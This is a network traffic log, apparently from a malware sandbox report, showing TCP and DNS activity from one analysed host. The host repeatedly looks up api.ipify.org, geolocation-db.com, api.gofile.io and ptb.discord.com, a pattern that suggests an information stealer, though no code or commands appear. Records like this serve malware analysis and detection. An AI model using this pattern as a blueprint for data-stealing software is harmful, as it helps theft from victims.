                                                                                                                                                                                          Sep 8, 2023 07:31:31.914002895 CEST49719443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:31.914804935 CEST49719443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:31.914824009 CEST44349719173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:32.522542953 CEST44349719173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:32.534657955 CEST49719443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:32.534704924 CEST44349719173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:32.536607027 CEST44349719173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:32.536787987 CEST49719443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:32.540225983 CEST49719443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:32.540477991 CEST44349719173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:32.540527105 CEST49719443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:32.583511114 CEST44349719173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:32.666294098 CEST49719443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:32.666373968 CEST44349719173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:32.885030985 CEST49719443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:32.919593096 CEST44349719173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:32.919766903 CEST44349719173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:32.919881105 CEST49719443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:34.194210052 CEST49719443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:34.704921007 CEST49720443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:34.704998016 CEST44349720159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:34.705084085 CEST49720443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:34.706121922 CEST49720443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:34.706150055 CEST44349720159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:35.660866022 CEST44349720159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:35.661449909 CEST49720443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:35.661484957 CEST44349720159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:35.662750006 CEST44349720159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:35.662838936 CEST49720443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:35.666091919 CEST49720443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:35.666261911 CEST44349720159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:35.666548967 CEST49720443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:35.666563034 CEST44349720159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:35.807168007 CEST49720443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:36.000281096 CEST44349720159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:36.000382900 CEST44349720159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:36.000430107 CEST49720443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:36.001651049 CEST49720443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:36.423608065 CEST49724443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:36.423671961 CEST44349724162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:36.423782110 CEST49724443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:36.424952030 CEST49724443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:36.424984932 CEST44349724162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:36.757669926 CEST44349724162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:36.764158964 CEST49724443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:36.764202118 CEST44349724162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:36.767559052 CEST44349724162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:36.767703056 CEST49724443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:36.769787073 CEST49724443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:36.769952059 CEST49724443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:36.770008087 CEST49724443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:36.770016909 CEST44349724162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:36.811492920 CEST44349724162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:36.975505114 CEST44349724162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:36.975732088 CEST49724443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:37.255919933 CEST44349724162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:37.256158113 CEST44349724162.159.137.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:37.256278992 CEST49724443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:37.257250071 CEST49724443192.168.2.7162.159.137.232
                                                                                                                                                                                          Sep 8, 2023 07:31:37.471580982 CEST49725443192.168.2.751.178.66.33
                                                                                                                                                                                          Sep 8, 2023 07:31:37.471636057 CEST4434972551.178.66.33192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:37.471750975 CEST49725443192.168.2.751.178.66.33
                                                                                                                                                                                          Sep 8, 2023 07:31:37.969717026 CEST49725443192.168.2.751.178.66.33
                                                                                                                                                                                          Sep 8, 2023 07:31:37.969779015 CEST4434972551.178.66.33192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:38.981033087 CEST4434972551.178.66.33192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:38.981616020 CEST49725443192.168.2.751.178.66.33
                                                                                                                                                                                          Sep 8, 2023 07:31:38.981659889 CEST4434972551.178.66.33192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:38.983011007 CEST4434972551.178.66.33192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:38.983129025 CEST49725443192.168.2.751.178.66.33
                                                                                                                                                                                          Sep 8, 2023 07:31:38.991888046 CEST49725443192.168.2.751.178.66.33
                                                                                                                                                                                          Sep 8, 2023 07:31:38.992104053 CEST49725443192.168.2.751.178.66.33
                                                                                                                                                                                          Sep 8, 2023 07:31:39.361880064 CEST49726443192.168.2.764.185.227.156
                                                                                                                                                                                          Sep 8, 2023 07:31:39.361965895 CEST4434972664.185.227.156192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:39.362066984 CEST49726443192.168.2.764.185.227.156
                                                                                                                                                                                          Sep 8, 2023 07:31:39.363636017 CEST49726443192.168.2.764.185.227.156
                                                                                                                                                                                          Sep 8, 2023 07:31:39.363672972 CEST4434972664.185.227.156192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:40.054210901 CEST4434972664.185.227.156192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:40.054867029 CEST49726443192.168.2.764.185.227.156
                                                                                                                                                                                          Sep 8, 2023 07:31:40.054917097 CEST4434972664.185.227.156192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:40.057223082 CEST4434972664.185.227.156192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:40.057480097 CEST49726443192.168.2.764.185.227.156
                                                                                                                                                                                          Sep 8, 2023 07:31:40.060182095 CEST49726443192.168.2.764.185.227.156
                                                                                                                                                                                          Sep 8, 2023 07:31:40.060362101 CEST49726443192.168.2.764.185.227.156
                                                                                                                                                                                          Sep 8, 2023 07:31:40.060451031 CEST4434972664.185.227.156192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:40.198194027 CEST49726443192.168.2.764.185.227.156
                                                                                                                                                                                          Sep 8, 2023 07:31:40.198276043 CEST4434972664.185.227.156192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:40.307497025 CEST49726443192.168.2.764.185.227.156
                                                                                                                                                                                          Sep 8, 2023 07:31:40.507030964 CEST4434972664.185.227.156192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:40.507189035 CEST4434972664.185.227.156192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:40.507280111 CEST49726443192.168.2.764.185.227.156
                                                                                                                                                                                          Sep 8, 2023 07:31:40.520936012 CEST49726443192.168.2.764.185.227.156
                                                                                                                                                                                          Sep 8, 2023 07:31:40.921957016 CEST49728443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:40.922029018 CEST44349728159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:40.922138929 CEST49728443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:40.923369884 CEST49728443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:40.923403025 CEST44349728159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:41.884169102 CEST44349728159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:41.884984016 CEST49728443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:41.885021925 CEST44349728159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:41.887216091 CEST44349728159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:41.887387991 CEST49728443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:41.892368078 CEST49728443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:41.892612934 CEST49728443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:41.892656088 CEST44349728159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:42.073365927 CEST49728443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:42.073410034 CEST44349728159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:42.226142883 CEST44349728159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:42.226217031 CEST49728443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:42.227093935 CEST49728443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:42.605079889 CEST49735443192.168.2.7162.159.135.232
                                                                                                                                                                                          Sep 8, 2023 07:31:42.605145931 CEST44349735162.159.135.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:42.605241060 CEST49735443192.168.2.7162.159.135.232
                                                                                                                                                                                          Sep 8, 2023 07:31:42.607139111 CEST49735443192.168.2.7162.159.135.232
                                                                                                                                                                                          Sep 8, 2023 07:31:42.607168913 CEST44349735162.159.135.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:42.937060118 CEST44349735162.159.135.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:42.937556982 CEST49735443192.168.2.7162.159.135.232
                                                                                                                                                                                          Sep 8, 2023 07:31:42.937586069 CEST44349735162.159.135.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:42.938842058 CEST44349735162.159.135.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:42.938931942 CEST49735443192.168.2.7162.159.135.232
                                                                                                                                                                                          Sep 8, 2023 07:31:42.940915108 CEST49735443192.168.2.7162.159.135.232
                                                                                                                                                                                          Sep 8, 2023 07:31:42.941061974 CEST44349735162.159.135.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:42.941083908 CEST49735443192.168.2.7162.159.135.232
                                                                                                                                                                                          Sep 8, 2023 07:31:42.941138983 CEST49735443192.168.2.7162.159.135.232
                                                                                                                                                                                          Sep 8, 2023 07:31:42.941148996 CEST44349735162.159.135.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:43.011008978 CEST49735443192.168.2.7162.159.135.232
                                                                                                                                                                                          Sep 8, 2023 07:31:43.443401098 CEST44349735162.159.135.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:43.443564892 CEST44349735162.159.135.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:43.443644047 CEST49735443192.168.2.7162.159.135.232
                                                                                                                                                                                          Sep 8, 2023 07:31:43.444555998 CEST49735443192.168.2.7162.159.135.232
                                                                                                                                                                                          Sep 8, 2023 07:31:44.008488894 CEST49737443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:44.008522987 CEST44349737173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:44.008594036 CEST49737443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:44.010288954 CEST49737443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:44.010305882 CEST44349737173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:44.635425091 CEST44349737173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:44.640785933 CEST49737443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:44.640837908 CEST44349737173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:44.643368959 CEST44349737173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:44.643563986 CEST49737443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:44.645874023 CEST49737443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:44.646207094 CEST49737443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:44.646219969 CEST44349737173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:44.691477060 CEST44349737173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:44.760637999 CEST49737443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:44.760663986 CEST44349737173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:44.869906902 CEST49737443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:45.033227921 CEST44349737173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:45.033361912 CEST44349737173.231.16.76192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:45.033451080 CEST49737443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:45.034141064 CEST49737443192.168.2.7173.231.16.76
                                                                                                                                                                                          Sep 8, 2023 07:31:45.387531042 CEST49738443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:45.387593985 CEST44349738159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:45.387676954 CEST49738443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:45.389355898 CEST49738443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:45.389393091 CEST44349738159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:46.372438908 CEST44349738159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:46.373532057 CEST49738443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:46.373589039 CEST44349738159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:46.375046968 CEST44349738159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:46.375181913 CEST49738443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:46.378602982 CEST49738443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:46.378835917 CEST49738443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:46.378875971 CEST44349738159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:46.573215008 CEST49738443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:46.573267937 CEST44349738159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:46.723366976 CEST44349738159.89.102.253192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:46.723572016 CEST49738443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:46.729980946 CEST49738443192.168.2.7159.89.102.253
                                                                                                                                                                                          Sep 8, 2023 07:31:47.081656933 CEST49739443192.168.2.7162.159.136.232
                                                                                                                                                                                          Sep 8, 2023 07:31:47.081729889 CEST44349739162.159.136.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:47.081828117 CEST49739443192.168.2.7162.159.136.232
                                                                                                                                                                                          Sep 8, 2023 07:31:47.082834959 CEST49739443192.168.2.7162.159.136.232
                                                                                                                                                                                          Sep 8, 2023 07:31:47.082861900 CEST44349739162.159.136.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:47.415707111 CEST44349739162.159.136.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:47.416203976 CEST49739443192.168.2.7162.159.136.232
                                                                                                                                                                                          Sep 8, 2023 07:31:47.416229010 CEST44349739162.159.136.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:47.417695045 CEST44349739162.159.136.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:47.417841911 CEST49739443192.168.2.7162.159.136.232
                                                                                                                                                                                          Sep 8, 2023 07:31:47.421291113 CEST49739443192.168.2.7162.159.136.232
                                                                                                                                                                                          Sep 8, 2023 07:31:47.421516895 CEST44349739162.159.136.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:47.421554089 CEST49739443192.168.2.7162.159.136.232
                                                                                                                                                                                          Sep 8, 2023 07:31:47.421638012 CEST49739443192.168.2.7162.159.136.232
                                                                                                                                                                                          Sep 8, 2023 07:31:47.421658993 CEST44349739162.159.136.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:47.463797092 CEST49739443192.168.2.7162.159.136.232
                                                                                                                                                                                          Sep 8, 2023 07:31:47.929728985 CEST44349739162.159.136.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:47.929883957 CEST44349739162.159.136.232192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:47.929963112 CEST49739443192.168.2.7162.159.136.232
                                                                                                                                                                                          Sep 8, 2023 07:31:47.930764914 CEST49739443192.168.2.7162.159.136.232
                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Sep 8, 2023 07:31:25.197752953 CEST5487153192.168.2.78.8.8.8
                                                                                                                                                                                          Sep 8, 2023 07:31:25.198550940 CEST5882053192.168.2.78.8.8.8
                                                                                                                                                                                          Sep 8, 2023 07:31:25.397181034 CEST53588208.8.8.8192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:25.398648024 CEST53548718.8.8.8192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:26.548656940 CEST5865053192.168.2.78.8.8.8
                                                                                                                                                                                          Sep 8, 2023 07:31:26.747035027 CEST53586508.8.8.8192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:28.211025953 CEST6182753192.168.2.78.8.8.8
                                                                                                                                                                                          Sep 8, 2023 07:31:28.413131952 CEST53618278.8.8.8192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:31.344490051 CEST5653253192.168.2.78.8.8.8
                                                                                                                                                                                          Sep 8, 2023 07:31:31.556756020 CEST53565328.8.8.8192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:34.505997896 CEST5448853192.168.2.78.8.8.8
                                                                                                                                                                                          Sep 8, 2023 07:31:34.703324080 CEST53544888.8.8.8192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:36.174547911 CEST5937853192.168.2.78.8.8.8
                                                                                                                                                                                          Sep 8, 2023 07:31:36.386863947 CEST53593788.8.8.8192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:37.265516043 CEST5854853192.168.2.78.8.8.8
                                                                                                                                                                                          Sep 8, 2023 07:31:37.469054937 CEST53585488.8.8.8192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:39.158814907 CEST5653053192.168.2.78.8.8.8
                                                                                                                                                                                          Sep 8, 2023 07:31:39.360116005 CEST53565308.8.8.8192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:40.668000937 CEST6108753192.168.2.78.8.8.8
                                                                                                                                                                                          Sep 8, 2023 07:31:40.915772915 CEST53610878.8.8.8192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:42.350007057 CEST5682353192.168.2.78.8.8.8
                                                                                                                                                                                          Sep 8, 2023 07:31:42.579523087 CEST53568238.8.8.8192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:43.804495096 CEST5360553192.168.2.78.8.8.8
                                                                                                                                                                                          Sep 8, 2023 07:31:44.006851912 CEST53536058.8.8.8192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:45.176448107 CEST5765853192.168.2.78.8.8.8
                                                                                                                                                                                          Sep 8, 2023 07:31:45.385262966 CEST53576588.8.8.8192.168.2.7
                                                                                                                                                                                          Sep 8, 2023 07:31:46.865626097 CEST5813953192.168.2.78.8.8.8
                                                                                                                                                                                          Sep 8, 2023 07:31:47.077600002 CEST53581398.8.8.8192.168.2.7
                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                          Sep 8, 2023 07:31:25.197752953 CEST192.168.2.78.8.8.80x5d73Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:25.198550940 CEST192.168.2.78.8.8.80xefc1Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:26.548656940 CEST192.168.2.78.8.8.80x629bStandard query (0)geolocation-db.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:28.211025953 CEST192.168.2.78.8.8.80x156eStandard query (0)ptb.discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:31.344490051 CEST192.168.2.78.8.8.80x6f0Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:34.505997896 CEST192.168.2.78.8.8.80xfde4Standard query (0)geolocation-db.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:36.174547911 CEST192.168.2.78.8.8.80x76b9Standard query (0)ptb.discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:37.265516043 CEST192.168.2.78.8.8.80xd4fcStandard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:39.158814907 CEST192.168.2.78.8.8.80xf4f6Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:40.668000937 CEST192.168.2.78.8.8.80x37f7Standard query (0)geolocation-db.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:42.350007057 CEST192.168.2.78.8.8.80xb6ebStandard query (0)ptb.discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:43.804495096 CEST192.168.2.78.8.8.80x8a5bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:45.176448107 CEST192.168.2.78.8.8.80xfe02Standard query (0)geolocation-db.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:46.865626097 CEST192.168.2.78.8.8.80x8a24Standard query (0)ptb.discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                          Sep 8, 2023 07:31:25.397181034 CEST8.8.8.8192.168.2.70xefc1No error (0)api.gofile.io51.38.43.18A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:25.397181034 CEST8.8.8.8192.168.2.70xefc1No error (0)api.gofile.io151.80.29.83A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:25.397181034 CEST8.8.8.8192.168.2.70xefc1No error (0)api.gofile.io51.178.66.33A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:25.398648024 CEST8.8.8.8192.168.2.70x5d73No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:25.398648024 CEST8.8.8.8192.168.2.70x5d73No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:25.398648024 CEST8.8.8.8192.168.2.70x5d73No error (0)api4.ipify.org104.237.62.212A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:25.398648024 CEST8.8.8.8192.168.2.70x5d73No error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:26.747035027 CEST8.8.8.8192.168.2.70x629bNo error (0)geolocation-db.com159.89.102.253A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:28.413131952 CEST8.8.8.8192.168.2.70x156eNo error (0)ptb.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:28.413131952 CEST8.8.8.8192.168.2.70x156eNo error (0)ptb.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:28.413131952 CEST8.8.8.8192.168.2.70x156eNo error (0)ptb.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:28.413131952 CEST8.8.8.8192.168.2.70x156eNo error (0)ptb.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:28.413131952 CEST8.8.8.8192.168.2.70x156eNo error (0)ptb.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:31.556756020 CEST8.8.8.8192.168.2.70x6f0No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:31.556756020 CEST8.8.8.8192.168.2.70x6f0No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:31.556756020 CEST8.8.8.8192.168.2.70x6f0No error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:31.556756020 CEST8.8.8.8192.168.2.70x6f0No error (0)api4.ipify.org104.237.62.212A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:34.703324080 CEST8.8.8.8192.168.2.70xfde4No error (0)geolocation-db.com159.89.102.253A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:36.386863947 CEST8.8.8.8192.168.2.70x76b9No error (0)ptb.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:36.386863947 CEST8.8.8.8192.168.2.70x76b9No error (0)ptb.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:36.386863947 CEST8.8.8.8192.168.2.70x76b9No error (0)ptb.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:36.386863947 CEST8.8.8.8192.168.2.70x76b9No error (0)ptb.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:36.386863947 CEST8.8.8.8192.168.2.70x76b9No error (0)ptb.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:37.469054937 CEST8.8.8.8192.168.2.70xd4fcNo error (0)api.gofile.io51.178.66.33A (IP address)IN (0x0001)false
                                                                                                                                                                                          Sep 8, 2023 07:31:37.469054937 CEST8.8.8.8192.168.2.70xd4fcNo error (0)api.gofile.io151.80.29.83A (IP address)IN (0x0001)false
